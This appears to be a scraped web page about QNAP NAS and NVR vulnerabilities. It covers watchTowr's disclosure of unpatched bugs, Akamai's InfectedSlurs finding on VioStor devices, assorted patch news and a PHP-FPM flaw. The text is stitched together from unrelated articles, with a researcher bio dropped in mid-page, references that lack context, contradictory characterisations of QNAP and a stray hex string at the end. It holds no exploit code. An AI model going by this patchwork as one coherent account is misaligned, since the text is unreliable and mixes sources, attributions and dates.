PATCHED QNAP CD
Mina Spartin
Six of the remaining 11 bugs were accepted and validated by QNAP, and all have CVEs assigned to them, but despite most being reported in early January, and one as far back as December 2023, the vendor still hasn't released patches.
It's standard practice to allow a vendor 90 days to fix and disclose a vulnerability reported to it by a researcher. It allows time to assess the threat, develop a fix, devise a strategy for rolling out patches, and decide when and how to disclose it publicly.
Especially generous researchers, or those reporting particularly confounding bugs that aren't so easily fixed, will sometimes extend this 90-day window to ensure the vulnerability is patched properly, even if it means letting it go unfixed for a longer period.
According to watchTowr, the majority of the bugs it outlined were reported to QNAP in January, implying going public on May 17 would mean the researchers offered the vendor a much larger window in which to issue patches.
"Here at watchTowr, we abide by an industry-standard 90-day period for vendors to respond to issues, as specified in our VDP," said watchTowr. "We are usually generous in granting extensions to this in unusual circumstances, and indeed, QNAP has received multiple extensions in order to allow remediation.
Despite the apparent inability of the vendor to issue patches on time, the researchers said QNAP was highly cooperative throughout the disclosure process. The vendor offered watchTowr's team remote access to its testing environment to allow for more comprehensive vulnerability reporting.
QNAP's security practices have been called into question numerous times in recent years. The highest profile cases have arguably involved ransomware, with various strains taking shots at the vendor's devices over the years.
The following year saw another ransomware event at the hands of DeadBolt. The criminals behind the operation launched at least four different waves of ransomware attacks against QNAP NAS devices, updating code along the way for stronger and faster encryption.
The situation became so bad that the vendor took the controversial measure of force-updating devices that users hadn't patched. Many NAS owners at the time didn't respond positively, since the updates could have led to important data loss.
As recently as February QNAP was also accused of bungling the severity assessment of a vulnerability that both researchers and national security agencies agreed required urgent patching. QNAP assigned CVE-2023-50358 a mere 5.8 severity rating out of a possible 10.
Researchers at watchTowr were especially keen to highlight CVE-2024-27130, a stack overflow vulnerability requiring no authentication that can lead to remote code execution (RCE) providing a valid NAS user shared a malicious file.
It's generally considered bad practice for anyone to release proof of concept (PoC) exploit code for vulnerabilities that haven't been patched, but watchTowr has done so via GitHub, perhaps to hurry QNAP along.
The researchers said they empathize with QNAP, which manages a codebase heavily composed of ten-year-old code, and how the vendor is "working hard to squeeze all the bugs out of it." However, given its prior history of suffering damaging attacks, patches should probably be developed at a faster rate.
Larry W. Cashdollar has been working in the security field as a vulnerability researcher for more than 20 years and is currently a Principal Security Researcher on the Security Intelligence Response Team at Akamai. He studied computer science at the University of Southern Maine. Larry has documented more than 300 CVEs and has presented his research at BotConf, BSidesBoston, OWASP Rhode Island, and DEF CON. He enjoys the outdoors and rebuilding small engines in his spare time.
The Akamai Security Intelligence Response Team (SIRT) has issued an additional update to the InfectedSlurs advisory series now that one of the affected vendors has released advisory information and guidance.
We provided an extensive list of indicators of compromise (IOCs), Snort rules, and YARA rules in the original research to help identify these exploit attempts in the wild and possible active infections on defender networks.
As part of our InfectedSlurs research, the SIRT uncovered a vulnerability in QNAP VioStor network video recorder (NVR) devices that is being actively exploited in the wild. The NVR device is a high-performance network surveillance solution for network-based monitoring of IP cameras, video recording, playback, and remote data access. The vulnerability has been given the CVE ID of CVE-2023-47565 with a CVSS v3 score of 8.0.
The vulnerability allows an authenticated attacker to achieve OS command injection with a payload delivered via a POST request to the management interface. In its current configuration, it is utilizing device default credentials in the captured payloads.
QNAP considers these devices discontinued for support; however, the vendor recommends upgrading VioStor firmware on existing devices to the latest available version. This issue had previously been patched, although it was never publicly reported/disclosed. Furthermore, users should change the default passwords on their devices.
Initially, when we reviewed exploit payloads during the InfectedSlurs campaign, we reported only on two zero-day vulnerabilities as the team was unable to positively link the observed exploit to a given device or manufacturer. This made it difficult to confirm the zero-day classification of the exploit.
After deeper examination of various aspects of the exploit and payload, the SIRT believed the target to be QNAP VioStor NVR devices. These devices fit the targeting profile of the campaign and were shipped with weak default credentials (found in their manuals and observed in the exploit). As is the case with the initial two zero-days, the infected devices could facilitate OS command injection vulnerabilities in NTP settings on the affected Internet of Things (IoT) and NVR devices.
Once again, our custom honeypot network deployment has provided valuable insights into cyberattacks, revealing previously unknown vulnerabilities. The presence of default credentials and outdated, unsupported networked systems has emerged as a route for botnet infections. Legacy systems are fertile ground for new vulnerabilities to be discovered and exploited in order to propagate malware.
This finding emphasizes the critical importance of enhancing awareness and education on best practices for IoT, highlighting associated risks for the average consumer; the need for awareness extends beyond consumers and applies to manufacturers of these devices as well. Longer software support cycles and security upon setup, such as forced password changes, are critical to maintaining system security.
QNAP patched three vulnerabilities in its network-attached storage (NAS) products, one of which with a critical CVSS score of 9.8, and the other two of medium severity, both which have CVSS scores well under 5.0.
The vendor recommended that security teams running QNAP NAS devices should regularly update their systems and applications to the latest version to benefit from the vulnerability fixes. The company made no mention as to whether these bugs were actively exploited in the wild. QNAP made a similar set of patches to QNAP NAS devices in January.
Roughly a month ago, QNAP patched 24 vulnerabilities across its product range, including two high-severity flaws that could enable command execution, and in late January, QNAP patched a dangerous flaw affecting QTS 5.0.1 and QuTS hero h.5.0.1.
The flaws, which were among a raft of serious bugs addressed by the Taiwanese hardware vendor last week, can both lead to remote code execution (RCE), according to a blog post published on March 31 by security researcher Yaniv Puyeski of SAM Seamless Network.
Another QNAP advisory indicates that a QNAP NAS package is still pending for v8.5.2 of third-party application Twonky Server after its vendor, Lynx Technology, patched a pair of high severity bugs in the media server that can be combined to damaging effect.
Found by Sven Krewitt of Risk Based Security and disclosed on March 16, the flaws include an improper access restriction vulnerability that can expose the administrator username and password, and a weak password obfuscation flaw facilitating password decryption.
The problem appears to be in the part of PHP that deals with FPM and isn't a new vulnerability. It's been known about in theory for three years, but only now has it been shown to be exploitable. FPM is a FastCGI Process Manager that a webserver passes requests to and which can spawn and kill PHP processes as needed. If set up in a particular way, this FPM can be manipulated into writing data past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.
Note that this is totally different from QNAP's recent unfortunate experience with Deadbolt ransomware. The reason why QNAP, out of all the NAS vendors, appears to have so many problems is that it's both very popular and takes a conscientious approach to issuing security advisories and deploying patches. Given that the vulnerability hasn't been patched for all QNAP operating systems yet, it has been assigned the status 'Fixing.'
In the meantime, QNAP recommends users update to the latest firmware for their storage box. This can be done in the system control panel, using the Live Update panel, or by downloading an update file directly from the QNAP website.
b1e95dc632